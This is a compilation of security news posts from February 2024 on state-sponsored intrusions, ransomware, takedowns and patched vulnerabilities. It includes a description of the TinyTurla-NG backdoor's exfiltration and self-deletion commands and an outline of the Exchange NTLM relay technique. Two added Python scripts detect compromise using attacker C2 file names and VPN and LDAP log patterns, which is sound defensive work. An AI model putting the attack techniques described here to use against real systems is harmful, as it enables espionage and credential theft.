(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

North Korea-linked actors breached the emails of a Presidential Office member

15 February 2024 at 15:22

The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.

The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.

The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.

At this time it’s unclear what information was exposed; however, Yoon’s office stressed that the threat actors did not compromise the office’s own security system.

“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”

South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.

North Korea-linked APT groups are also known to focus on attacks against cryptocurrency exchanges and financial organizations in South Korea.

Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

A cyberattack halted operations at Varta production plants

15 February 2024 at 18:43

On February 12, 2024, a cyber attack halted operations at five production plants of German battery manufacturer Varta.

On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.

VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.

The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.

The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.

“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”

The impacted production plants are in Germany, Romania and Indonesia; as of February 14, operations at the plants were still halted.

“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.

At this time, no known ransomware group has claimed responsibility for the attack.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Varta)

US Gov dismantled the Moobot botnet controlled by Russia-linked APT28

15 February 2024 at 19:40

The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.

A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti EdgeOS routers. It was initially built by a known cybercriminal group and later taken over by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Networks Unit 42 researchers in February 2021. In November 2021, it began exploiting a critical command injection flaw (CVE-2021-36260) in the web server of several Hikvision products, and since September 2022 it has been observed targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.

“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”

According to court documents, the government extensively tested the operation on the relevant Ubiquiti EdgeOS routers. The DoJ pointed out that, apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing a factory reset of their routers or by accessing their routers through the local network.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Moobot botnet)

Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs

16 February 2024 at 08:05

Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.

Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.

TinyTurla-NG was spotted in early December 2023, it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.

“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.

Talos also discovered previously undetected PowerShell scripts, dubbed “TurlaPower-NG”, that were designed for data exfiltration. Turla operators used the scripts to exfiltrate the keys used to secure the password databases of popular password management software.

The cybersecurity firm identified three different TinyTurla-NG samples and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that the campaign may have begun as early as November 2023.

Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. Threat actors compromised the websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2. The attackers uploaded PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.


Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.

Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.

The malware supports the following commands:

  • “changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
  • “changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
  • “get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
  • “post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
  • “killme”: Create a BAT file with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat

The report includes indicators of compromise (IoCs).
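As an added hunting aid for WordPress administrators (this is not Talos's code; the version.php content and the file listing below are constructed samples), the following Python extracts the WordPress version from wp-includes/version.php, checks it against the versions Talos reported as compromised, and scans a file listing for the C2 script names quoted above after re-fanging the `[.]` notation:

```python
import re
from pathlib import PurePosixPath

# Versions and C2 file names exactly as reported by Cisco Talos (see text above).
TARGETED_WP_VERSIONS = {"4.4.20", "5.0.21", "5.1.18", "5.7.2"}
C2_FILE_NAMES_DEFANGED = ["rss-old[.]php", "rss[.]old[.]php", "block[.]old[.]php"]


def refang(name):
    """Turn the report's defanged 'a[.]b' notation back into a real file name."""
    return name.replace("[.]", ".")


C2_FILE_NAMES = {refang(n).lower() for n in C2_FILE_NAMES_DEFANGED}

# wp-includes/version.php defines the version as: $wp_version = '5.7.2';
_WP_VERSION_RE = re.compile(r"\$wp_version\s*=\s*'([^']+)'")


def extract_wp_version(version_php_text):
    m = _WP_VERSION_RE.search(version_php_text)
    return m.group(1) if m else None


def is_targeted_version(version):
    """True if the install runs one of the versions Talos saw compromised.
    This says the site is in the targeted set, not that it is compromised."""
    return version in TARGETED_WP_VERSIONS


def find_c2_candidates(paths):
    """Return paths whose basename matches one of the reported C2 script names."""
    return sorted(p for p in paths if PurePosixPath(p).name.lower() in C2_FILE_NAMES)


def hunt(version_php_text, file_listing):
    version = extract_wp_version(version_php_text)
    return {
        "wp_version": version,
        "version_in_targeted_set": is_targeted_version(version),
        "c2_candidates": find_c2_candidates(file_listing),
    }


# Constructed sample input standing in for a real webroot.
SAMPLE_VERSION_PHP = "<?php\n$wp_version = '5.7.2';\n$wp_db_version = 49752;\n"
SAMPLE_LISTING = [
    "/var/www/html/wp-includes/version.php",
    "/var/www/html/wp-content/uploads/2023/12/rss-old.php",
    "/var/www/html/wp-content/themes/x/block.old.php",
    "/var/www/html/wp-content/rss.php",
    "/var/www/html/index.php",
]

if __name__ == "__main__":
    print(hunt(SAMPLE_VERSION_PHP, SAMPLE_LISTING))
```

A clean result from the name check is weak evidence: the operators can rename the PHP dropper at will, so any PHP file recently written under wp-content that is not part of a known plugin or theme deserves a look regardless of its name.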

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

U.S. CISA: hackers breached a state government organization

16 February 2024 at 12:04

U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.

CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.

The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor obtained network administrator credentials through the account of a former employee and used them to authenticate successfully to an internal virtual private network (VPN) access point. The attackers then moved laterally and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The organization also hosts sensitive data in an Azure environment, which was not accessed by the attackers.

“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.

The threat actor likely obtained the employee’s account credentials from a third-party data breach.

The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.

CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.

Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.

The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.
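As an added example of detection logic for the chain described above (this is not CISA's or MS-ISAC's code; the log format, account names, IP ranges and timestamps are constructed), the following Python flags successful VPN logons by offboarded accounts and by privileged accounts without MFA, and attributes LDAP searches coming from the VPN address pool back to the VPN session that held that client address at the time:

```python
import ipaddress

# Constructed reference data. In practice these come from the HR offboarding
# feed, the identity provider's MFA enrolment report and the privileged-group list.
VPN_POOL = ipaddress.ip_network("10.200.0.0/24")
OFFBOARDED = {"jdoe_admin"}            # left the organisation, account should be disabled
MFA_ENROLLED = {"ops_admin"}           # the only privileged account with MFA
PRIVILEGED = {"jdoe_admin", "sp_admin", "ops_admin"}

# Constructed sample log lines: key=value after a timestamp and a host name.
VPN_AUTH_LOG = [
    "2024-01-10T02:14:05Z vpn-gw user=jdoe_admin result=SUCCESS assigned_ip=10.200.0.17 src=198.51.100.23",
    "2024-01-10T09:00:11Z vpn-gw user=ops_admin result=SUCCESS assigned_ip=10.200.0.18 src=203.0.113.5",
    "2024-01-10T02:20:44Z vpn-gw user=sp_admin result=SUCCESS assigned_ip=10.200.0.17 src=198.51.100.23",
    "2024-01-10T02:21:00Z vpn-gw user=guest result=FAILURE assigned_ip=- src=198.51.100.23",
]
DC_LDAP_LOG = [
    "2024-01-10T02:16:30Z dc01 event=LDAP_SEARCH client=10.200.0.17 base=DC=corp,DC=local filter=(objectClass=user)",
    "2024-01-10T02:17:02Z dc01 event=LDAP_SEARCH client=10.200.0.17 base=DC=corp,DC=local filter=(adminCount=1)",
    "2024-01-10T09:05:00Z dc01 event=LDAP_SEARCH client=10.200.0.18 base=OU=Printers,DC=corp,DC=local filter=(objectClass=printQueue)",
    "2024-01-10T09:06:00Z dc01 event=LDAP_SEARCH client=10.10.5.5 base=DC=corp,DC=local filter=(cn=svc_backup)",
]


def parse_kv(line):
    """Split '<ts> <host> k=v k=v ...' into a dict; only the first '=' of each field splits."""
    ts, host, *fields = line.split()
    rec = {"ts": ts, "host": host}
    for f in fields:
        k, _, v = f.partition("=")
        rec[k] = v
    return rec


def vpn_findings(vpn_lines):
    """Successful VPN logons by accounts that should not be able to log on at all."""
    findings = []
    for rec in map(parse_kv, vpn_lines):
        if rec.get("result") != "SUCCESS":
            continue
        user = rec["user"]
        if user in OFFBOARDED:
            findings.append((rec["ts"], user, "offboarded account authenticated to VPN"))
        if user in PRIVILEGED and user not in MFA_ENROLLED:
            findings.append((rec["ts"], user, "privileged account without MFA authenticated to VPN"))
    return findings


def ldap_from_vpn(vpn_lines, ldap_lines):
    """For each LDAP search from the VPN pool, name the VPN user holding that IP.
    Simplification: the latest session assigned the IP at or before the query owns it;
    a real pipeline would also honour session-end events."""
    sessions = {}
    for rec in map(parse_kv, vpn_lines):
        if rec.get("result") == "SUCCESS":
            sessions.setdefault(rec["assigned_ip"], []).append(rec)
    hits = []
    for rec in map(parse_kv, ldap_lines):
        if ipaddress.ip_address(rec["client"]) not in VPN_POOL:
            continue
        owner = None
        for s in sorted(sessions.get(rec["client"], []), key=lambda r: r["ts"]):
            if s["ts"] <= rec["ts"]:
                owner = s["user"]
        hits.append((rec["ts"], rec["client"], owner, rec["filter"]))
    return hits


if __name__ == "__main__":
    for f in vpn_findings(VPN_AUTH_LOG):
        print("ALERT", *f)
    for h in ldap_from_vpn(VPN_AUTH_LOG, DC_LDAP_LOG):
        print("LDAP via VPN", *h)
```

The two checks are cheap because they are pure set lookups against data the organisation already has; the hard part the advisory points at is keeping the offboarded list and the MFA enrolment report current, and disabling the account rather than relying on detection.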

CISA did not attribute the attack to a specific threat actor.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders

16 February 2024 at 18:48

The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.

The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward of up to $5 million for information leading to the arrest and/or conviction, in any country, of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward targets the affiliates and initial access brokers who facilitated the group’s attacks.

The BlackCat/ALPHV ransomware gang has been active since November 2021. The list of its victims is long and includes the industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, the gas pipeline operator Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the primary domain of the group went offline and the administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site had been taken offline as a result of a law enforcement operation. The group always denied this, but on December 19 the domain displayed the seizure notice to visitors.

The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, the UK, the Netherlands, Australia, Spain and Austria, together with Europol.

“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Göttingen.” reads the message published by law enforcement on the seized websites.


“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation, it amassed hundreds of millions of dollars in ransom payments.  

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog

16 February 2024 at 19:36

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
  • CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The vulnerability CVE-2024-21410 is an elevation of privilege issue in Microsoft Exchange Server. An attacker who obtains a victim’s Net-NTLMv2 hash (for example by leaking it from an NTLM client such as Outlook) can relay it to the Exchange server, authenticate as that user and perform operations on the server on the victim’s behalf. Enabling Extended Protection for Authentication on Exchange binds the NTLM authentication to the TLS channel and blocks the relay.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication (EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 7, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks

17 February 2024 at 10:45

CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild.

This week the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco ASA and FTD bug, tracked as CVE-2020-3259 (CVSS score: 7.5), to its Known Exploited Vulnerabilities catalog.

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.

In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco ASA and FTD appliances.

“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.

An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.

The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in the Cisco AnyConnect SSL VPN was the entry point in at least six of the compromised devices.

“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.

The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability CVE-2020-3259 by March 7, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes

17 February 2024 at 16:38

A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses.

Ukrainian national Vyacheslav Igorevich Penchukov has pleaded guilty to his key roles in the Zeus and IcedID malware operations.

“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”

In October 2022, Swiss police arrested Penchukov, also known as Tank, one of the leaders of the JabberZeus cybercrime group, in Geneva.

The man was extradited to the United States in 2023; he had been on the FBI’s “Most Wanted” list and sought for nearly 10 years.


In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as the JabberZeus crew. JabberZeus was a small cybercriminal ring that targeted SMBs with a custom-made version of the Zeus banking trojan. At the time, the DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules, and of receiving alerts once a bank account had been compromised.

The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank had told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, had just been born, and had shared her birth weight.

Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.

Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections: the late son of former Ukrainian President Victor Yanukovych served as godfather to Tank’s daughter Miloslava.

Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced to two years and ten months of incarceration in May 2015 followed by a supervised release of 1 year.

Since May 2009, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID, also known as Bokbot.

Penchukov faces up to 20 years in prison for each count, he is scheduled to be sentenced on May 9.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, IcedID Malware)

Security Affairs newsletter Round 459 by Pierluigi Paganini – INTERNATIONAL EDITION

18 February 2024 at 14:21

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes
CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks
CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog
US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders
U.S. CISA: hackers breached a state government organization
Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs
US Gov dismantled the Moobot botnet controlled by Russia-linked APT28
A cyberattack halted operations at Varta production plants
North Korea-linked actors breached the emails of a Presidential Office member
Nation-state actors are using AI services and LLMs for cyberattacks
Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages
Zoom fixed critical flaw CVE-2024-24691 in Windows software
Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader
Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days
A ransomware attack took 100 Romanian hospitals down
Bank of America customer data compromised after a third-party services provider data breach
Ransomfeed – Third Quarter Report 2023 is out!
Global Malicious Activity Targeting Elections is Skyrocketing
Researchers released a free decryption tool for the Rhysida Ransomware
Residential Proxies vs. Datacenter Proxies: Choosing the Right Option
CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog
Canada Gov plans to ban the Flipper Zero to curb car thefts
ExpressVPN leaked DNS requests due to a bug in the split tunneling feature
9 Possible Ways Hackers Can Use Public Wi-Fi to Steal Your Sensitive Data
US Feds arrested two men involved in the Warzone RAT operation
Raspberry Robin spotted using two new 1-day LPE exploits

Cybercrime

International Cybercrime Malware Service Dismantled by Federal Authorities: Key Malware Sales and Support Actors in Malta and Nigeria Charged in Federal Indictments  

As-a-Service tools empower criminals with limited tech skills 

Ransomware Attack Takes 100 Hospitals Offline 

Reward for Information: ALPHV/Blackcat Ransomware as a Service

Foreign National Pleads Guilty to Role in Cybercrime Schemes Involving Tens of Millions of Dollars in Losses      

Malware

RASPBERRY ROBIN KEEPS RIDING THE WAVE OF ENDLESS 1-DAYS

A Method for Decrypting Data Infected with Rhysida Ransomware  

Bypassing EDRs With EDR-Preloading  

Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)

Face Off  

Hacking

Snap Trap: The Hidden Dangers Within Ubuntu’s Package Suggestion System

Disrupting malicious uses of AI by state-affiliated threat actors      

CISA and MS-ISAC Release Advisory on Compromised Account Used to Access State Government Organization

Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

Intelligence and Information Warfare 

Global Malicious Activity Targeting Elections Is Skyrocketing  

Staying ahead of threat actors in the age of AI  

US needs to take China’s cyber-threat to US infrastructure more seriously 

South Korea says presumed North Korean hackers breached personal emails of presidential staffer  

TinyTurla Next Generation – Turla APT spies on Polish NGOs  

Cybersecurity          

Building a Data Fortress: Data Security and Privacy in the Age of Generative AI and LLMs

Package Theft Statistics  

After a tip, ExpressVPN acts swiftly to protect customers  

Canada to ban the Flipper Zero to stop surge in car thefts

I’m a cyber expert, these are the five things you need to do to ‘digitally break up’ with someone in the age of login sharing  

THE FEBRUARY 2024 SECURITY UPDATE REVIEW  

Fertility tracker Glow fixes bug that exposed users’ personal data

European Court of Human Rights declares backdoored encryption is illegal

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

ESET fixed high-severity local privilege escalation bug in Windows products

18 February 2024 at 15:38

Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.

ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.

The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.

“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.

ESET is not aware of attacks in the wild exploiting this vulnerability.

Below is the list of impacted programs and versions:

  • ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
  • ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
  • ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
  • ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
  • ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
  • ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
  • ESET File Security for Microsoft Azure (all versions)

The cybersecurity firm has released patches to address the issues in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, File Security for Microsoft Azure.

The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.

The company recommended customers patch their products as soon as possible.

